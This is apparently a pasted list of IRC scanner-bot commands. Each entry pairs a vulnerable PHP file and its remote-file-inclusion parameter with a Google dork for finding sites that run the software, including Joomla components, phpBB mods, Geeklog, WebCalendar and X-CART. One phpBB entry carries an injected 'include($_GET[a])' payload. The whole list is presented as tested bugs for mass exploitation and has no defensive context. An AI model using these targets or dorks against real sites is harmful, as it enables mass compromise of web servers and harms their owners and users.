!scan themes/program/themesettings.inc.php?themesdir= "Segue CMS"

!scan lib/rs.php?rootpath= CASTOR

!scan phpcalendar/includes/setup.php?phpc_root_path= Virtual Law Office

Bug&Dork

!scan includes/ktedit/toolbar.php?dirDepth= ktmlpro

!scan ?custompluginfile%5B%5D= Subdreamer categoryid

!scan ?custompluginfile%5B%5D= "Website Powered by Subdreamer"

!scan include/lib.inc.php?site_path= rgboard

!scan index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path= "/includes/mambo.php"

!scan index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path= "mambo/index.php"

!scan demo1/auction_confirmation.inc.php/header.php?prefix= browse.php?id=?

!scan phpAdsNew/view.inc.php?phpAds_path= auction/index.php

!scan playing.php/common/db.php?commonpath= inurl:"playing.php"

!scan viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a= "Powered by phpBB 2.0" "Powered by phpBB 2.0"+org "Powered by phpBB 2.0" "Powered by phpBB 2.0"+hk

!scan errors.php?error= "index of" errors.php

!scan index.php?option=com_custompages&cpage= inurl:"com_custompages"

!scan index2.php?option=com_custompages&cpage= inurl:"com_custompages"

!scan mainbody.php?option=com_custompages&cpage= inurl:"com_custompages"

!scan editsite.php?returnpath= "editsite.php"

!scan slice.php3?GLOBALS[AA_INC_PATH]= slice.php3?GLOBALS[AA_INC_PATH]=

!scan files/carprss.php?CarpPath= "by SiteBuilder Elite"

!scan accounts/inc/include.php?language=0&lang_settings[0][1]= "Powered by IceWarp Software Merak Email Server" IceWarp Web Mail 5.4

!scan config.inc.php?path_escape= home "post ad" "post event" "post image"

!scan ipblock.inc.php?path_escape= home "post ad" "post event" "post image"

!scan ipblock.inc.php?path_escape= event(s) today "All Upcoming Events"

!scan ws/login.php?noSet=0&includedir= "Public Access (Login)" WebCalendar

!scan vwar/convert/mvcw.php?step=1&vwar_root= "de/vwar"

!scan protection.php?action=logout&siteurl= "approved by TheFanlistings.org"

!scan ?mosConfig_absolute_path= "Free Software released under the GNU/GPL License"

!scan ?mosConfig_absolute_path= Joomla Template by

!scan plugins/spamx/MassDelete.Admin.class.php?_CONF[path]= "All trademarks and copyrights on this page are owned by their respective owners" Geeklog

!scan plugins/spamx/MailAdmin.Action.class.php?_CONF[path]= "Powered By GeekLog" "Created this page in" seconds

!scan admin.php?include_path= "Teken het gastenboek" Onderhoud

!scan includes/db_connect.php?baseDir= "Version 2.0.4 "You must have cookies enabled in your browser"

!scan bookmark4u/lostpasswd.php?env[include_prefix]= bookmark4u

!scan index.php?a= ".de/index.php?a="

!scan index.php?skin_file= "Powered by Mp3ToolBox

!scan index.php?filename= "35mm Slide Gallery 6.0"

!scan protection.php?action=logout&siteurl= "Members" "The complete list" "view sorted by country" "/members.php?id=all" >> start

!scan protection.php?action=logout&siteurl= "/members.php?id=all"

!scan protection.php?action=logout&siteurl= "Members" "The complete list" "view sorted by country" "ID" "Name" "Email" "URL"

!scan accueil.php?menu= "asso.fr/accueil.php?menu="

!scan comments-display-tpl.php?config[comments_form_tpl]= "Powered By TalkBack"

!scan /?file= inurl:?/?file=contact? intext:?About Us? -cfm -asp -index.php -.cgi -aspx mulai

!scan modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= ".php?name=Forums"

!scan modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path= PNphpBB2

!scan plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]= geeklog

!scan admin.php?include_path= "IP-adres genoteerd" "HTML is"

!scan index.php?strona= "/index.php?strona="

!scan index.php?strona= "/index.php?strona=" site:pl

!scan index1.php?page= "/index1.php?page="

!scan index1.php?page= "/index1.php?page=" ".php"

!scan includes/functions_mod_user.php?phpbb_root_path= phpBBViet

!scan ?mosConfig_absolute_path= "Joomla! is Free Software released under the GNU/GPL License."

!scan ?mosConfig_absolute_path= "Joomla Is"

!scan language/lang_english/lang_main_album.php?phpbb_root_path= "Czech translation by Vitek"

!scan index.php?pg= "Search | Invite | Mail | Blog | Forum" site:mx

!scan administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path= inurl:"com_jjgallery

!scan modules/Neos_Chronos/header.php?base_folder= "Neos_Chronos"

!scan historytemplate.php?cms[support]=1&cms[tngpath]= "powered by The Next Generation of Genealogy Sitebuilding"

!scan includes/messages.inc.php?include_path= messages.inc.php

!scan contact.php?AD_BODY_TEMP= "Not+required+for+reporting+a+file"

!scan includes/db_connect.php?baseDir= "dotProject" "Version" "cookie" site:cn

!scan /modules/Forums/admin/admin_db_utilities.php?phpbb_root_path= /modules/Forums/

!scan contenido/classes/class.inuse.php?cfg[path][contenido]= Contenido Login

!scan includes/db_connect.php?baseDir= "dotProject logo"

!scan index.php?lg= "index.php?lg=" site:be

!scan skin/zero_vote/ask_password.php?dir= zeroboard site:.us

!scan admin.php?include_path= "Total Records:" "HTML code is" "Advanced" site:.com

!scan index2.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= mambo

!scan admin.php?include_path= "Total Records:" "HTML code is" "Advanced

!scan components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path= com_pollxt

!scan administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path= com_colophon

!scan components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path= com_loudmounth

!scan components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= com_videodb

!scan components/com_cloner/cloner.php?mosConfig_absolute_path= "joomla"

!scan administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path= com_multibanners

!scan administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site= com_a6mambohelpdesk

!scan components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path= com_mambatstaff

!scan components/com_securityimages/configinsert.php?mosConfig_absolute_path= com_securityimages

!scan components/com_securityimages/lang.php?mosConfig_absolute_path= com_securityimages

!scan components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path= com_artlinks

!scan components/com_galleria/galleria.html.php?mosConfig_absolute_path= com_galleria

!scan administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path= com_mgm

!scan components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path= com_mambatstaff

!scan redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]= inurl:redaxo

!scan admin.php?include_path= Advanced Guestbook 2.3.4

!scan template.php?page= phpBB Group

!scan phpBB2/admin/admin_cash.php?setmodules=1&phpbb_root_path= phpBB Group

!scan forum/admin/admin_cash.php?setmodules=1&phpbb_root_path= phpBB Group

!scan mods/iai/includes/constants.php?phpbb_root_path= phpBB PlusXL

!scan phpBB2-MODificat/includes/functions.php?phpbb_root_path= PHPBB2

!scan includes/bbcb_mg.php?phpbb_root_path= phpBBXS

!scan includes/archive/archive_topic.php?phpbb_root_path= phpbbXtra

!scan modules.php?op=modload&name=Wiki&file=index&pagename= PHP-Wiki

!scan includes/setup.php?phpc_root_path= PHP-Calendar

!scan templates/default/tpl_message.php?right_file= "PHP TopTree BBS"

!scan config.php?fullpath= "PHP TopSites"

!scan auction/email_request.php?user_id= "PHP Surveyor"

!scan modules/projects/index.php?full_path= "PHP Project Management"

!scan xarg_corner.php?xarg= "PHP Image XArg"

!scan screen.php?neurl= "News Evolution"

!scan /_theme/breadcrumb.php?rootBase= new Female Celebrities

!scan show.php?file= "Helplink"

!scan form.php?floap=modfich&do= GenesisTrader

!scan inc/pipe.php?HCL_path= "Help Center Live"

!scan admin/business_inc/saveserver.php?thisdir= confixx

!scan modules/Forums/favorites.php?nuke_bb_root_path= "Powered by Platinum"

!scan /manager/index.php= "Etomite"

!scan /index.php?basePath= "gizzar"

!scan /Index.php?abs_url= "PEGames"

!scan /index.php?page= "3editor CMS"

!scan /index.php?AML_opensite= "AllMyLinks"

!scan /index.php?AMV_openconfig=1&AMV_serverpath= "AllMyVisitors"

!scan /lang/index.php?file= "oreon"

!scan /index.php?gen= "mafia-2-0-0"

!scan /index.php?catid= "CascadianFAQ"

!scan /index.php?rootpath= "DreamStats System"

!scan /index.php?n= "Jupiter CMS"

!scan /index.php?option=news&aktion=komm&ID= "HC NEWSSYSTEM"

!scan /index.php?function=custom&custom= "Shopping Catalog"

!scan /admin/index.php?p= "iPrimal"

!scan /classes/index.php?siteconf= "Lithium"

!scan /Cookie/index.php= "Imageview"

!scan /index.php= "Berty Forum"

!scan /index.php?section= "Jasmine-Web"

!scan /index.php?contentSpecial= "eboli"

!scan /templates/tmpl_dfl/scripts/index.php?dir[inc]= "Boonex Dolphin"

!scan /index.php?page= "tagit2b"

!scan /index.php?catid= "PHP Classifieds"

!scan /search.php?catid_search= "PHP Classifieds"

!scan /p!scan /search.php?catid_search= "PHP Classifieds"

!scan /index.php?file_name[]= "PowerPortal"

!scan /admin/index.php?o= "BrudaGB"

!scan /index.php?gr_1_id= "Eskolar"

!scan /boitenews4/index.php?url_index= "Boite de News"

!scan /index.php?news_include_path= "newsReporter"

!scan /index.php?page= "ClanSys"

!scan /index.php?mod=sondages&do= "PwsPHP"

!scan /appserv/main.php?appserv_root= appserv

!scan solpot.html?body= allinurl: "solpot.html?body"

!scan /config.php?xcart_dir= "X-CART"

Old Bug-Dork


Joomla Bugs


Bug Dork WordPress


Bug Dork PHPBB


Bug&dork New


Bugs Tested


.scan2 /classes/Import_MM.class.php?g_rb_basedir= “PHPRecipeBook”
.scan2 /?sIncPath= “Copyright © 2008 Your Company.”
.scan2 /?sIncPath= “/index.php?members_mode=”
.scan2 /?sIncPath= “/index.php?members_mode=top”
.scan2 /?sIncPath= “index.php?tags_mode=profile”
.scan2 /common/db.php?commonpath= “playing.php”
.scan2 /update/update2.php?lang= photokorn 1.53
.scan2 /index.php?view=page&pagename= “/?view=main&cityid=”
.scan2 /index.php?view=page&pagename= “You have an error in your SQL syntax;”
.scan2 /index.php?view=page&pagename= “/?view=selectcity&targetview=post&cityid=-3&lang=en”
.scan2 /index.php?load= “/index.php?load=home”
.scan2 /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir= “/index.php?module=Pagesetter”
.scan2 /page.php?id= “RCMS-Pro”
.scan2 /page.php?id= “©2005 – 2006 Roosevelt Purification. RGameScript is a free software under GNU/GPL License”
.scan2 /page.php?id= “/index.php?id=cats”
.scan2 /function.inc.php?path= “ACGVclick” “ACGVclick”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “MODx” “MODx”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “MODx Parse Error”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “/index.php?id=5?
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “/index.php?id=1&start=10?
.scan2 /tools/send_reminders.php?noSet=0&includedir= “WebCalendar v1.1.0c-CVS”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “snippets/reflect”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “MODx CMS”
.scan2 /assets/snippets/reflect/snippet.reflect.php?reflect_base= “My MODx Site is powered by MODx Content Management System”
.scan2 /index.php?view=page&pagename= “Buy, sell, trade, date, events… post anything”
.scan2 /index.php?view=page&pagename= “Thank you for stopping by my site. Here you can leave your mark.”
.scan2 /includes/function_core.php?web_root= “Mp3 Rating”
.scan2 /?mosConfig_absolute_path= “Powered by Joomla!”
.scan2 /modules/Forums/admin/admin_words.php?phpbb_root_path= “Hebrew Ver. HebNukeR 2.0 © 2004 by HebNukeR.org. All Rights Reserved”
.scan2 /index.php?option=com_custompages&cpage= Joomla custompages
.scan2 /booth.php?include_path= “/poll_cookie.php”
.scan2 /update/update2.php?lang= “photo foto gallery bilder tauchen wracks galerie”
.scan2 /header.php?base_folder= “Powered by Bab.stats”
.scan2 /tools/send_reminders.php?noSet=0&includedir= WebCalendar v1.0RC3 (11 Mar 2005)
.scan2 /index.php?cmd&file= “Membre avec photos seulement ?”
.scan2 /index.php?cmd&file= “%22HOME%22+%22%7C%22+%22UPLOAD+YOUR+PHOTO%22+%22%7C%22+%22LATEST+USERS%22+%22%7C%22+%22TOP+10%22+%22%7C%22+%22TOP+GUYS%22+%22%7C%22+%22TOP+GIRLS%22+%22%7C%22+%22CONTACT%22?
.scan2 /index.php?cmd&file= “List Users with Pics only?”
.scan2 /index.php?cmd&file= “So you think you’re HOT?”
.scan2 /contenido/external/frontend/news.php?cfg[path][includes]= Contenido Login
.scan2 /contenido/external/frontend/news.php?cfg[path][includes]= “Contenido Login” “Contenido Login”
.scan2 /clmcpreload.php?CLPATH= “CaLogic” “Calendars”
.scan2 /txt-db-api/txt-db-api.php?API_HOME_DIR= “linkmix” “linkmix” “linkmix”
.scan2 /cms/system/openengine.php?oe_classpath= “/cms/website.php?id=/de/”
.scan2 /modules/Forums/admin/admin_words.php?phpbb_root_path= “Thai Edition by ThaiNuke”
.scan2 index.php?custompluginfile[]= “Sorry, your account does not have access to submit information”
.scan2 include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= /index.php?nwaction=shownews
.scan2 include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= /article.php?article_file=
.scan2 include/editfunc.inc.php?NWCONF_SYSTEM[server_path]= “Newswriter” “Newswriter”
.scan2 /modules/coppermine/themes/coppercop/theme.php?THEME_DIR= “coppermine” “coppermine” “coppermine”
.scan2 /config.inc.php?path_escape= “Your Personal Search Advisor !”
.scan2 /include/scripts/export_batch.inc.php?DIR= “ModernBill”
.scan2 /config/config_admin.php?INC= “YourWebsitename gives you the best search results and keyword bidding.”
.scan2 /config/config_admin.php?INC= %22home%22+%22%7C%22+%22login%22+%22%7C%22+%22add+your+site%22+%22%7C%22+%22affiliate+program%22+%22%7C%22+%22privacy%22+%22%7C%22+%22terms%22
.scan2 /include/admin.lib.inc.php?site_path= /view.php?bbs_id=
.scan2 /clmcpreload.php?CLPATH= “© Philip Boone”
.scan components/com_virtuemart/install.php?mosConfig_absolute_path= “powered by VirtueMart”
.scan includes/archive/archive_topic.php?phpbb_root_path= IntegraMOD
.scan components/com_moofaq/includes/file_includer.php?gzip=0&file= "com_moofaq"
.scan /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path= /com_fabrik/
.scan /index.php?option=com_fabrik&task=view&Itemid=&mosConfig_absolute_path= /com_fabrik/
.scan /snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir= snippetmaster
.scan2 ?dir[func]=&dir[base]= "Ladder Scripts"
.scan /accounts/inc/errors.php?error= "Powered By: Merak Mail Server Software"
.scan conf.php?subdir= "wow roster"
.scan /config/config_admin.php?INC= "Keyword" "Add Your Site"
.scan src/admin/pt_upload.php?config_file=[localserverfile]&ptconf[src]=
.scan ?INCLUDE_FOLDER= "e404.php"?*.st"
.scan /?_zb_path= "/bbs/" "/zboard/"
.scan //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path= index.php
.scan source/mod/rss/viewitem.php?Codebase= ED Engine
.scan source/mod/rss/channeledit.php?Codebase= WebEd
.scan prepare.php?xcart_dir= "X-CART. Powerful PHP shopping cart software"
.scan /admin/frontpage_right.php?loadadminpage= Copyright © 2007 Agares Media
.scan /index.php?get= inurl”index.php?get=”
.scan /index.php?target= inurl”index.php?target=”
